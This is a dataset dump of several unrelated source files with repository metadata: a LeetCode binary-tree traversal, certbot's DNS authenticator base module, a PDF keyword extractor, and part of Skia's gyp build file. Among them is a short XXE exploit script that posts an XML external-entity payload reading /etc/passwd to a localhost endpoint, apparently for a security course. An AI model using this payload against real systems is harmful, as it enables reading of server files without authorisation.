] | null | null | null | Dataset/Leetcode/valid/102/204.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution:
def XXX(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
#思想就是使用队列辅助,首先根节点入队,然后开始循环,当队列不为空,不停的出队并将出队节点的左右节点入队
res=[]
q=[root]
count1,count2=1,0
#主要问题就是这个输出格式有点脑瘫,非得一层一起输出,所以这里定义两个变量count1,count2,为什么定两个,可以理解成一个用来统计下一层有多少节点,一个用来在输出这一层的时候遍历,这一层输出完要进入下一层的时候更新一下变量值
while q:
temp=[] #临时数组,用来储存这一层的所有节点
for _ in range(count1): #遍历这一层的所有节点
p=q.pop(0)
temp.append(p.val)
if p.left:
q.append(p.left)
count2+=1 #统计下一层的节点数
if p.right:
q.append(p.right)
count2+=1 #统计下一层的节点数
res.append(temp)
count1,count2=count2,0 #进入下一层,更新变量值
return res
| 33.32 | 124 | 0.521008 | class Solution:
def XXX(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
res=[]
q=[root]
count1,count2=1,0
while q:
temp=[]
for _ in range(count1):
p=q.pop(0)
temp.append(p.val)
if p.left:
q.append(p.left)
count2+=1
if p.right:
q.append(p.right)
count2+=1
res.append(temp)
count1,count2=count2,0
return res
| true | true |
f719056e15b29ef4606019d3603298ad5627461c | 314 | py | Python | exploits/xml_exploit.py | denny00786/CASoftwareDevelopment | d03c82b6bb033a39b4270115ec464eca773e0814 | [
"Apache-2.0"
] | 1 | 2020-04-02T00:29:16.000Z | 2020-04-02T00:29:16.000Z | exploits/xml_exploit.py | denny00786/CASoftwareDevelopment | d03c82b6bb033a39b4270115ec464eca773e0814 | [
"Apache-2.0"
] | null | null | null | exploits/xml_exploit.py | denny00786/CASoftwareDevelopment | d03c82b6bb033a39b4270115ec464eca773e0814 | [
"Apache-2.0"
] | 4 | 2021-04-01T21:31:01.000Z | 2022-03-23T08:22:44.000Z | import requests
# XXE (XML External Entity) proof-of-concept against a local test endpoint.
url = 'http://localhost/xml'
# The payload declares an external entity "xxe" that resolves to
# file:///etc/passwd; a vulnerable XML parser expands &xxe; inside <foo>
# and leaks the file contents in its response.
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
# Submit the payload in the form field the endpoint parses as XML.
data = {'input_data': shellcode}
response = requests.post(url, data=data)
# If the target is vulnerable, the body echoes /etc/passwd.
print(response.text)
| 15.7 | 58 | 0.640127 | import requests
url = 'http://localhost/xml'
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
data = {'input_data': shellcode}
response = requests.post(url, data=data)
print(response.text)
| true | true |
f71905d79157038348e3b499a02d4481fdbe417c | 11,471 | py | Python | certbot/plugins/dns_common.py | aaroncohen/certbot | c3434bac26592585d12feb781a87f3e2be846e42 | [
"Apache-2.0"
] | 1 | 2018-09-12T03:07:11.000Z | 2018-09-12T03:07:11.000Z | certbot/plugins/dns_common.py | 978740431/certbot | c3434bac26592585d12feb781a87f3e2be846e42 | [
"Apache-2.0"
] | null | null | null | certbot/plugins/dns_common.py | 978740431/certbot | c3434bac26592585d12feb781a87f3e2be846e42 | [
"Apache-2.0"
] | null | null | null | """Common code for DNS Authenticator Plugins."""
import abc
import logging
import os
import stat
from time import sleep
import configobj
import zope.interface
from acme import challenges
from certbot import errors
from certbot import interfaces
from certbot.display import ops
from certbot.display import util as display_util
from certbot.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class DNSAuthenticator(common.Plugin):
    """Base class for DNS Authenticators"""
    def __init__(self, config, name):
        super(DNSAuthenticator, self).__init__(config, name)
        # Only attempt record cleanup if perform() actually ran.
        self._attempt_cleanup = False
    @classmethod
    def add_parser_arguments(cls, add, default_propagation_seconds=10): # pylint: disable=arguments-differ
        add('propagation-seconds',
            default=default_propagation_seconds,
            type=int,
            help='The number of seconds to wait for DNS to propagate before asking the ACME server '
                 'to verify the DNS record.')
    # This authenticator only ever offers the dns-01 challenge type.
    def get_chall_pref(self, unused_domain): # pylint: disable=missing-docstring,no-self-use
        return [challenges.DNS01]
    def prepare(self): # pylint: disable=missing-docstring
        pass
    # Create one TXT record per challenge, then wait for propagation.
    def perform(self, achalls): # pylint: disable=missing-docstring
        self._setup_credentials()
        self._attempt_cleanup = True
        responses = []
        for achall in achalls:
            domain = achall.domain
            validation_domain_name = achall.validation_domain_name(domain)
            validation = achall.validation(achall.account_key)
            self._perform(domain, validation_domain_name, validation)
            responses.append(achall.response(achall.account_key))
        # DNS updates take time to propagate and checking to see if the update has occurred is not
        # reliable (the machine this code is running on might be able to see an update before
        # the ACME server). So: we sleep for a short amount of time we believe to be long enough.
        logger.info("Waiting %d seconds for DNS changes to propagate",
                    self.conf('propagation-seconds'))
        sleep(self.conf('propagation-seconds'))
        return responses
    # Remove the TXT records, but only if perform() got far enough to
    # have set up credentials (tracked via _attempt_cleanup).
    def cleanup(self, achalls):  # pylint: disable=missing-docstring
        if self._attempt_cleanup:
            for achall in achalls:
                domain = achall.domain
                validation_domain_name = achall.validation_domain_name(domain)
                validation = achall.validation(achall.account_key)
                self._cleanup(domain, validation_domain_name, validation)
    @abc.abstractmethod
    def _setup_credentials(self):  # pragma: no cover
        """
        Establish credentials, prompting if necessary.
        """
        raise NotImplementedError()
    @abc.abstractmethod
    def _perform(self, domain, validation_domain_name, validation):  # pragma: no cover
        """
        Performs a dns-01 challenge by creating a DNS TXT record.
        :param str domain: The domain being validated.
        :param str validation_domain_name: The validation record domain name.
        :param str validation: The validation record content.
        :raises errors.PluginError: If the challenge cannot be performed
        """
        raise NotImplementedError()
    @abc.abstractmethod
    def _cleanup(self, domain, validation_domain_name, validation):  # pragma: no cover
        """
        Deletes the DNS TXT record which would have been created by `_perform_achall`.
        Fails gracefully if no such record exists.
        :param str domain: The domain being validated.
        :param str validation_domain_name: The validation record domain name.
        :param str validation: The validation record content.
        """
        raise NotImplementedError()
    def _configure(self, key, label):
        """
        Ensure that a configuration value is available.
        If necessary, prompts the user and stores the result.
        :param str key: The configuration key.
        :param str label: The user-friendly label for this piece of information.
        """
        configured_value = self.conf(key)
        if not configured_value:
            new_value = self._prompt_for_data(label)
            setattr(self.config, self.dest(key), new_value)
    def _configure_file(self, key, label, validator=None):
        """
        Ensure that a configuration value is available for a path.
        If necessary, prompts the user and stores the result.
        :param str key: The configuration key.
        :param str label: The user-friendly label for this piece of information.
        """
        configured_value = self.conf(key)
        if not configured_value:
            new_value = self._prompt_for_file(label, validator)
            # Store an absolute path so renewal works from any CWD.
            setattr(self.config, self.dest(key), os.path.abspath(os.path.expanduser(new_value)))
    def _configure_credentials(self, key, label, required_variables=None):
        """
        As `_configure_file`, but for a credential configuration file.
        If necessary, prompts the user and stores the result.
        Always stores absolute paths to avoid issues during renewal.
        :param str key: The configuration key.
        :param str label: The user-friendly label for this piece of information.
        :param dict required_variables: Map of variable which must be present to error to display.
        """
        # Validate the file while prompting so a bad file is rejected
        # immediately, before it is stored in the configuration.
        def __validator(filename):
            if required_variables:
                CredentialsConfiguration(filename, self.dest).require(required_variables)
        self._configure_file(key, label, __validator)
        credentials_configuration = CredentialsConfiguration(self.conf(key), self.dest)
        if required_variables:
            credentials_configuration.require(required_variables)
        return credentials_configuration
    @staticmethod
    def _prompt_for_data(label):
        """
        Prompt the user for a piece of information.
        :param str label: The user-friendly label for this piece of information.
        :returns: The user's response (guaranteed non-empty).
        :rtype: str
        """
        def __validator(i):
            if not i:
                raise errors.PluginError('Please enter your {0}.'.format(label))
        code, response = ops.validated_input(
            __validator,
            'Input your {0}'.format(label),
            force_interactive=True)
        if code == display_util.OK:
            return response
        else:
            raise errors.PluginError('{0} required to proceed.'.format(label))
    @staticmethod
    def _prompt_for_file(label, validator=None):
        """
        Prompt the user for a path.
        :param str label: The user-friendly label for the file.
        :param callable validator: A method which will be called to validate the supplied input
            after it has been validated to be a non-empty path to an existing file. Should throw a
            `~certbot.errors.PluginError` to indicate any issue.
        :returns: The user's response (guaranteed to exist).
        :rtype: str
        """
        def __validator(filename):
            if not filename:
                raise errors.PluginError('Please enter a valid path to your {0}.'.format(label))
            filename = os.path.expanduser(filename)
            validate_file(filename)
            if validator:
                validator(filename)
        code, response = ops.validated_directory(
            __validator,
            'Input the path to your {0}'.format(label),
            force_interactive=True)
        if code == display_util.OK:
            return response
        else:
            raise errors.PluginError('{0} required to proceed.'.format(label))
class CredentialsConfiguration(object):
    """Represents a user-supplied file which stores API credentials."""
    def __init__(self, filename, mapper=lambda x: x):
        """
        :param str filename: A path to the configuration file.
        :param callable mapper: A transformation to apply to configuration key names
        :raises errors.PluginError: If the file does not exist or is not a valid format.
        """
        # Warn early about world-accessible credential files.
        validate_file_permissions(filename)
        try:
            self.confobj = configobj.ConfigObj(filename)
        except configobj.ConfigObjError as e:
            logger.debug("Error parsing credentials configuration: %s", e, exc_info=True)
            raise errors.PluginError("Error parsing credentials configuration: {0}".format(e))
        self.mapper = mapper
    def require(self, required_variables):
        """Ensures that the supplied set of variables are all present in the file.
        :param dict required_variables: Map of variable which must be present to error to display.
        :raises errors.PluginError: If one or more are missing.
        """
        messages = []
        for var in required_variables:
            # Distinguish "key absent" from "key present but empty".
            if not self._has(var):
                messages.append('Property "{0}" not found (should be {1}).'
                                .format(self.mapper(var), required_variables[var]))
            elif not self._get(var):
                messages.append('Property "{0}" not set (should be {1}).'
                                .format(self.mapper(var), required_variables[var]))
        if messages:
            raise errors.PluginError(
                'Missing {0} in credentials configuration file {1}:\n * {2}'.format(
                    'property' if len(messages) == 1 else 'properties',
                    self.confobj.filename,
                    '\n * '.join(messages)
                )
            )
    def conf(self, var):
        """Find a configuration value for variable `var`, as transformed by `mapper`.
        :param str var: The variable to get.
        :returns: The value of the variable.
        :rtype: str
        """
        return self._get(var)
    # Membership test for a (mapped) key in the parsed config file.
    def _has(self, var):
        return self.mapper(var) in self.confobj
    # Raw lookup of a (mapped) key; returns None when absent.
    def _get(self, var):
        return self.confobj.get(self.mapper(var))
def validate_file(filename):
    """Raise ``errors.PluginError`` unless ``filename`` is an existing regular file."""
    # Checked in order so a missing path reports "not found" rather than
    # "not a file".
    for predicate, message in ((os.path.exists, 'File not found: {0}'),
                               (os.path.isfile, 'Path is not a file: {0}')):
        if not predicate(filename):
            raise errors.PluginError(message.format(filename))
def validate_file_permissions(filename):
    """Validate that ``filename`` exists and warn if it is world-accessible."""
    validate_file(filename)

    mode = stat.S_IMODE(os.stat(filename).st_mode)
    world_bits = mode & stat.S_IRWXO
    if world_bits:
        # Credentials readable/writable by "other" are a security risk.
        logger.warning('Unsafe permissions on credentials configuration file: %s', filename)
def base_domain_name_guesses(domain):
    """Return progressively less-specific names derived from ``domain``.

    One of these is typically the zone name known to the DNS provider.

    :Example:

    >>> base_domain_name_guesses('foo.bar.baz.example.com')
    ['foo.bar.baz.example.com', 'bar.baz.example.com', 'baz.example.com', 'example.com', 'com']

    :param str domain: The domain for which to return guesses.
    :returns: Guesses ordered from most to least specific.
    :rtype: list
    """
    guesses = []
    labels = domain.split('.')
    # Peel one leading label per iteration until none remain.
    while labels:
        guesses.append('.'.join(labels))
        labels = labels[1:]
    return guesses
| 35.404321 | 107 | 0.648418 |
import abc
import logging
import os
import stat
from time import sleep
import configobj
import zope.interface
from acme import challenges
from certbot import errors
from certbot import interfaces
from certbot.display import ops
from certbot.display import util as display_util
from certbot.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class DNSAuthenticator(common.Plugin):
    """Base class for DNS authenticators.

    Solves DNS-01 challenges by delegating record creation and removal to
    the provider-specific ``_perform``/``_cleanup`` hooks implemented by
    subclasses.
    """
    def __init__(self, config, name):
        super(DNSAuthenticator, self).__init__(config, name)
        # Only attempt cleanup if perform() actually ran and created records.
        self._attempt_cleanup = False
    @classmethod
    def add_parser_arguments(cls, add, default_propagation_seconds=10):
        # Propagation delay varies by provider, so subclasses may override
        # the default via ``default_propagation_seconds``.
        add('propagation-seconds',
            default=default_propagation_seconds,
            type=int,
            help='The number of seconds to wait for DNS to propagate before asking the ACME server '
                 'to verify the DNS record.')
    def get_chall_pref(self, unused_domain):
        """Return the challenge types this plugin can solve (DNS-01 only)."""
        return [challenges.DNS01]
    def prepare(self):
        """No preparation is necessary for DNS plugins."""
        pass
    def perform(self, achalls):
        """Create validation records for each challenge, wait, and respond.

        :param list achalls: Annotated DNS-01 challenges to fulfill.
        :returns: Challenge responses, one per input challenge.
        :rtype: list
        """
        self._setup_credentials()
        self._attempt_cleanup = True
        responses = []
        for achall in achalls:
            domain = achall.domain
            validation_domain_name = achall.validation_domain_name(domain)
            validation = achall.validation(achall.account_key)
            self._perform(domain, validation_domain_name, validation)
            responses.append(achall.response(achall.account_key))
        # Give the provider time to publish the records before the ACME
        # server attempts validation.
        logger.info("Waiting %d seconds for DNS changes to propagate",
                    self.conf('propagation-seconds'))
        sleep(self.conf('propagation-seconds'))
        return responses
    def cleanup(self, achalls):
        """Remove any records created by :meth:`perform` (no-op otherwise)."""
        if self._attempt_cleanup:
            for achall in achalls:
                domain = achall.domain
                validation_domain_name = achall.validation_domain_name(domain)
                validation = achall.validation(achall.account_key)
                self._cleanup(domain, validation_domain_name, validation)
    @abc.abstractmethod
    def _setup_credentials(self):
        """Establish provider credentials (subclass hook)."""
        raise NotImplementedError()
    @abc.abstractmethod
    def _perform(self, domain, validation_domain_name, validation):
        """Create the validation record for ``validation_domain_name`` (subclass hook)."""
        raise NotImplementedError()
    @abc.abstractmethod
    def _cleanup(self, domain, validation_domain_name, validation):
        """Delete the record created by :meth:`_perform` (subclass hook)."""
        raise NotImplementedError()
    def _configure(self, key, label):
        """Prompt for ``key`` interactively if it was not already configured."""
        configured_value = self.conf(key)
        if not configured_value:
            new_value = self._prompt_for_data(label)
            setattr(self.config, self.dest(key), new_value)
    def _configure_file(self, key, label, validator=None):
        """Prompt for a file path for ``key`` if not already configured."""
        configured_value = self.conf(key)
        if not configured_value:
            new_value = self._prompt_for_file(label, validator)
            # Store a normalized absolute path with ~ expanded.
            setattr(self.config, self.dest(key), os.path.abspath(os.path.expanduser(new_value)))
    def _configure_credentials(self, key, label, required_variables=None):
        """Resolve, parse and validate a credentials file for ``key``.

        :returns: The parsed credentials configuration.
        :rtype: CredentialsConfiguration
        """
        def __validator(filename):
            # Validate candidate files during the interactive prompt, too.
            if required_variables:
                CredentialsConfiguration(filename, self.dest).require(required_variables)
        self._configure_file(key, label, __validator)
        credentials_configuration = CredentialsConfiguration(self.conf(key), self.dest)
        if required_variables:
            credentials_configuration.require(required_variables)
        return credentials_configuration
    @staticmethod
    def _prompt_for_data(label):
        """Interactively request a non-empty value described by ``label``."""
        def __validator(i):
            if not i:
                raise errors.PluginError('Please enter your {0}.'.format(label))
        code, response = ops.validated_input(
            __validator,
            'Input your {0}'.format(label),
            force_interactive=True)
        if code == display_util.OK:
            return response
        else:
            raise errors.PluginError('{0} required to proceed.'.format(label))
    @staticmethod
    def _prompt_for_file(label, validator=None):
        """Interactively request a path to an existing file described by ``label``."""
        def __validator(filename):
            if not filename:
                raise errors.PluginError('Please enter a valid path to your {0}.'.format(label))
            filename = os.path.expanduser(filename)
            validate_file(filename)
            if validator:
                validator(filename)
        code, response = ops.validated_directory(
            __validator,
            'Input the path to your {0}'.format(label),
            force_interactive=True)
        if code == display_util.OK:
            return response
        else:
            raise errors.PluginError('{0} required to proceed.'.format(label))
class CredentialsConfiguration(object):
def __init__(self, filename, mapper=lambda x: x):
validate_file_permissions(filename)
try:
self.confobj = configobj.ConfigObj(filename)
except configobj.ConfigObjError as e:
logger.debug("Error parsing credentials configuration: %s", e, exc_info=True)
raise errors.PluginError("Error parsing credentials configuration: {0}".format(e))
self.mapper = mapper
def require(self, required_variables):
messages = []
for var in required_variables:
if not self._has(var):
messages.append('Property "{0}" not found (should be {1}).'
.format(self.mapper(var), required_variables[var]))
elif not self._get(var):
messages.append('Property "{0}" not set (should be {1}).'
.format(self.mapper(var), required_variables[var]))
if messages:
raise errors.PluginError(
'Missing {0} in credentials configuration file {1}:\n * {2}'.format(
'property' if len(messages) == 1 else 'properties',
self.confobj.filename,
'\n * '.join(messages)
)
)
def conf(self, var):
return self._get(var)
def _has(self, var):
return self.mapper(var) in self.confobj
def _get(self, var):
return self.confobj.get(self.mapper(var))
def validate_file(filename):
if not os.path.exists(filename):
raise errors.PluginError('File not found: {0}'.format(filename))
if not os.path.isfile(filename):
raise errors.PluginError('Path is not a file: {0}'.format(filename))
def validate_file_permissions(filename):
validate_file(filename)
permissions = stat.S_IMODE(os.stat(filename).st_mode)
if permissions & stat.S_IRWXO:
logger.warning('Unsafe permissions on credentials configuration file: %s', filename)
def base_domain_name_guesses(domain):
fragments = domain.split('.')
return ['.'.join(fragments[i:]) for i in range(0, len(fragments))]
| true | true |
f7190714a40b489705d1a2f0f757254156b06f7f | 1,247 | py | Python | crawler/pdf.py | mental689/paddict | 493268b62531c698687d42416edf61c602250133 | [
"MIT"
] | 1 | 2019-06-22T10:28:21.000Z | 2019-06-22T10:28:21.000Z | crawler/pdf.py | mental689/paddict | 493268b62531c698687d42416edf61c602250133 | [
"MIT"
] | 4 | 2020-09-05T01:48:18.000Z | 2022-03-02T04:29:25.000Z | crawler/pdf.py | mental689/paddict | 493268b62531c698687d42416edf61c602250133 | [
"MIT"
] | null | null | null | #import PyPDF2 # PyPDF2 extracts texts from PDF markup. We found that it worked relatively poor with CVPR papers. Spaces between words are often omitted in the outputs.
import textract # textract uses external OCR command "tesseract" to extract texts. The workflow is to first convert pdf files to ppm images and then apply OCR to extract texts.
from nltk.tokenize import word_tokenize
import os, re
import django
django.setup()
from papers.settings import BASE_DIR
import xml.etree.ElementTree as ET
def get_stopwords():
    """Load the bundled stopword list (one word per line)."""
    path = "{}/static/stopwords.txt".format(BASE_DIR)
    with open(path) as handle:
        return [line.strip() for line in handle]
STOPWORDS = get_stopwords()
def extract_keywords_from_pdf(pdf_file):
    """OCR a PDF with tesseract and return cleaned keyword tokens.

    :param pdf_file: Path to the PDF file to process.
    :returns: Lowercased alphanumeric tokens longer than 2 characters,
        with stopwords removed.
    :rtype: list
    """
    raw = textract.process(pdf_file, method='tesseract', language='eng', layout="layout")
    # Bug fix: textract returns bytes, and str() on bytes yields the repr
    # (b'...' wrapper plus literal escape sequences such as "\\n") which then
    # pollutes the token stream -- the old code had to strip '-\\n' to
    # compensate.  Decode the bytes properly instead.
    text = raw.decode('utf-8', errors='ignore') if isinstance(raw, bytes) else str(raw)
    tokens = word_tokenize(text)
    # Re-join words hyphenated across line breaks and trim whitespace.
    tokens = [tk.strip().replace('-\n', '') for tk in tokens]
    words = [w for w in tokens if w not in STOPWORDS]
    words = [re.sub('[^0-9a-zA-Z]+', '', w).lower() for w in words]
    return [w for w in words if len(w) > 2]
def parse_cermine_output(cermine_file):
    """Parse a CERMINE XML output file.

    NOTE(review): the function currently only loads the XML tree and
    implicitly returns ``None`` -- it looks unfinished; confirm what the
    intended return value (e.g. extracted metadata) should be.
    """
    tree = ET.parse(cermine_file)
    root = tree.getroot()
| 34.638889 | 176 | 0.715317 | ee.ElementTree as ET
def get_stopwords():
with open("{}/static/stopwords.txt".format(BASE_DIR)) as f:
stopwords = [w.strip() for w in f.readlines()]
return stopwords
STOPWORDS = get_stopwords()
def extract_keywords_from_pdf(pdf_file):
text = str(textract.process(pdf_file, method='tesseract', language='eng', layout="layout"))
tokens = word_tokenize(text)
tokens =[tk.strip() for tk in tokens]
tokens =[tk.replace('-\\n','') for tk in tokens]
words = [w for w in tokens if w not in STOPWORDS]
words = [re.sub('[^0-9a-zA-Z]+','',w).lower() for w in words]
words = [w for w in words if len(w) > 2]
return words
def parse_cermine_output(cermine_file):
tree = ET.parse(cermine_file)
root = tree.getroot()
| true | true |
f71907581411d3f59e6caa7fc154349051e25a21 | 11,381 | gyp | Python | skia/skia_library_opts.gyp | shaochangbin/chromium-crosswalk | 634d34e4cf82b4f7400357c53ec12efaffe94add | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2 | 2019-01-16T03:57:28.000Z | 2021-01-23T15:29:45.000Z | skia/skia_library_opts.gyp | shaochangbin/chromium-crosswalk | 634d34e4cf82b4f7400357c53ec12efaffe94add | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null | skia/skia_library_opts.gyp | shaochangbin/chromium-crosswalk | 634d34e4cf82b4f7400357c53ec12efaffe94add | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2017-03-15T13:21:38.000Z | 2017-03-15T13:21:38.000Z | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This gyp file contains the platform-specific optimizations for Skia
{
'targets': [
# Due to an unfortunate intersection of lameness between gcc and gyp,
# we have to build the *_SSE2.cpp files in a separate target. The
# gcc lameness is that, in order to compile SSE2 intrinsics code, it
# must be passed the -msse2 flag. However, with this flag, it may
# emit SSE2 instructions even for scalar code, such as the CPUID
# test used to test for the presence of SSE2. So that, and all other
# code must be compiled *without* -msse2. The gyp lameness is that it
# does not allow file-specific CFLAGS, so we must create this extra
# target for those files to be compiled with -msse2.
#
    # This is actually only a problem on 32-bit Linux (all Intel Macs have
    # SSE2, Linux x86_64 has SSE2 by definition, and MSC will happily emit
    # SSE2 from intrinsics while generating plain ol' 386 for everything
    # else). However, to keep the .gyp file simple and avoid platform-specific
    # build breakage, we do this on all platforms.
# For about the same reason, we need to compile the ARM opts files
# separately as well.
{
'target_name': 'skia_opts',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'conditions': [
[ 'os_posix == 1 and OS != "mac" and OS != "android" and \
target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'cflags': [
'-msse2',
],
}],
[ 'target_arch != "arm" and target_arch != "mipsel" and \
target_arch != "arm64"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRect_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkUtils_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkBitmapFilter_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_SSE2.cpp',
],
'dependencies': [
'skia_opts_ssse3',
],
}],
# TODO(rmcilroy): Add neon support for arm64 - http://crbug.com/354405
[ 'target_arch == "arm"', {
'conditions': [
[ 'arm_version >= 7 and arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
[ 'arm_version >= 7 and arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
[ 'arm_version >= 7 and (arm_neon == 1 or arm_neon_optional == 1)', {
'cflags': [
# The neon assembly contains conditional instructions which
# aren't enclosed in an IT block. The assembler complains
# without this option.
# See #86592.
'-Wa,-mimplicit-it=always',
],
'dependencies': [
'skia_opts_neon',
]
}],
],
# The assembly uses the frame pointer register (r7 in Thumb/r11 in
# ARM), the compiler doesn't like that. Explicitly remove the
# -fno-omit-frame-pointer flag for Android, as that gets added to all
# targets via common.gypi.
'cflags!': [
'-fno-omit-frame-pointer',
'-marm',
'-mapcs-frame',
],
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_arm.cpp',
],
}],
[ 'target_arch == "arm" and (arm_version < 7 or (arm_neon == 0 and arm_neon_optional == 1))', {
'sources': [
'../third_party/skia/src/opts/memset.arm.S',
],
}],
[ 'target_arch == "arm" and arm_version < 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm" and arm_version >= 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.h',
'../third_party/skia/src/opts/SkBlurImage_opts_arm.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_arm.cpp',
'../third_party/skia/src/opts/SkUtils_opts_arm.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
],
}],
[ 'target_arch == "mipsel"',{
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm64"',{
# TODO(rmcilroy): Update this once http://crrev.com/143423004/ lands.
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
],
},
# For the same lame reasons as what is done for skia_opts, we have to
# create another target specifically for SSSE3 code as we would not want
# to compile the SSE2 code with -mssse3 which would potentially allow
# gcc to generate SSSE3 code.
{
'target_name': 'skia_opts_ssse3',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'conditions': [
[ 'OS in ["linux", "freebsd", "openbsd", "solaris", "android"]', {
'cflags': [
'-mssse3',
],
}],
[ 'OS == "mac"', {
'xcode_settings': {
'GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS': 'YES',
},
}],
[ 'OS == "win"', {
'include_dirs': [
'config/win',
],
'direct_dependent_settings': {
'include_dirs': [
'config/win',
],
},
}],
[ 'target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSSE3.cpp',
],
}],
],
},
{
'target_name': 'skia_opts_none',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
},
],
'conditions': [
# NEON code must be compiled with -mfpu=neon which also affects scalar
# code. To support dynamic NEON code paths, we need to build all
# NEON-specific sources in a separate static library. The situation
# is very similar to the SSSE3 one.
['target_arch == "arm" and (arm_neon == 1 or arm_neon_optional == 1)', {
'targets': [
{
'target_name': 'skia_opts_neon',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'cflags!': [
'-fno-omit-frame-pointer',
'-mfpu=vfp', # remove them all, just in case.
'-mfpu=vfpv3',
'-mfpu=vfpv3-d16',
],
'cflags': [
'-mfpu=neon',
'-fomit-frame-pointer',
],
'ldflags': [
'-march=armv7-a',
'-Wl,--fix-cortex-a8',
],
'sources': [
'../third_party/skia/src/opts/memset16_neon.S',
'../third_party/skia/src/opts/memset32_neon.S',
'../third_party/skia/src/opts/SkBitmapProcState_arm_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrixProcs_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_clamp_neon.h',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_repeat_neon.h',
'../third_party/skia/src/opts/SkBlitMask_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_neon.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_neon.cpp',
],
'conditions': [
['arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
['arm_neon_optional == 1', {
'defines': [
